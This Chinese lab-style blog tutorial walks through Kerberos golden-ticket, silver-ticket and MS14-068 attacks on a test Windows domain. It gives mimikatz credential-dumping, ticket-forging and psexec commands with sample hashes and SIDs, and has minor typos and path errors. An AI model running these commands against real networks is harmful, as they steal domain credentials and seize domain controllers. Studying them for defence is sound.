黄金票据其实就是伪造tgt的,关于什么是tgt请看我之前的博客,tgt也有人称是通票.
实验步骤:
1.1前提 需要域的sid和tgt的hahs值
1.2 获取域控的的hash值,需要在域控08服务器中获取
并且导出到当前目录的1.txt文件中
mimikatz.exe "privilege::debug" "lsadump::lsa /patch" exit > 1.txt
我们需要的东西就是ntlm值
1.3 获取域的sid值,可以直接在win7cmd命令行中输入whoami /all即可查看.
sid后面的1106是用户的id,是不需要用到的
1.4 删除本身存在的票据和尝试访问域控的c盘是否可以查看到文件夹,因为删除了相关的票据是访问不到域控的c盘,所以才有下文需要伪造黄金票据.
klist 是查看票据
klist purge 是删除所有的票据
net time 是查看域控的名称
dir WIN-9JJK4CNGD41.cyh.comc$ 是用查看域控服务器的的c盘
1.5 伪造黄金票据
从上面的过程中,我们收集到了sid和hash值,我们就可以伪造黄金票据了.
这里解析一下下面的语句是什么意思,user就是你需要的伪造用户,domain就是域控的域名,sid就是域的sid,krbtgt就是域控的hash值
mimikatz.exe "kerberos::golden /user:test /domain:cyh.com /sid:S-1-5-21-2511895695-3322341454-56546430 /krbtgt:f0a958f7f25b6cd174cab27936f11cb9 /ptt" exit
1.6 查看票据是否伪造成功,是否可以查看域控的c盘文件.
使用klist来查看是否伪造成功票据
然后dir c盘
1.7 获取域控的cmd命令
使用psexec软件可以实现获取域控的cmd
注意:192.168.0.222 是域控的ip地址 or 0.207是普通域用户的ip地址
psexec.exe \WIN-9JJK4CNGD41 cmd.exe
2.白银票据的伪造
白银票据也称为专票,就是指定去访问某一个服务的.
需要域的sid 域控的hash dc的ip地址
2.1 获取 WIN-9JJK4CNGD41 的hash值,也是在域控08机器上面获取.
c55118b9b45da492715bcdbb5406c7a6就是域控hash的值
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit > 2.txt
2.2 删除域的票据等操作
2.3 制作白银票据
user是用户,domain是域的域名,sid是域的sid和黄金票据的是一样的,target是域地址,service是指定需要访问的服务,rc4是hash值.
mimikatz.exe "kerberos::golden /user:test /domain:cyh.com /sid:S-1-5-21-2511895695-3322341454-56546430 /target:WIN-9JJK4CNGD41.cyh.com /service:cifs /rc4:c55118b9b45da492715bcdbb5406c7a6 /ptt" exit
2.4 查看票据和查看域控的c盘
3.ms14-068的利用,直接获取域控的身份
前面的黄金和白银票据都是需要获取域的hash值,但是ms14-068是不需要hash的值,只需要或者普通域用户的账号和密码即可.还有对用的用户sid值,但是有一个前提就是补丁没有打才可以使用.
3.1 清空票据
3.2 使用ms14-068.exe制作证书.
test@cyh.com 是域的用户,-p是普通域用户的密码,-s是用户的sid,而不是域的sid了,-d是域的地址
ms14-068.exe -u test@cyh.com -p 123.com -s S-1-5-21-2511895695-3322341454-56546430-1106 -d WIN-9JJK4CNGD41.cyh.com
后缀ccache就是我们获取的证书
3.3 使用mimikztz导入证书
mimikatz.exe "kerberos::ptc TGT_xy@cc.com.ccache" exit
3.4 查看票据
3.5 使用psexec来连接域控的cmd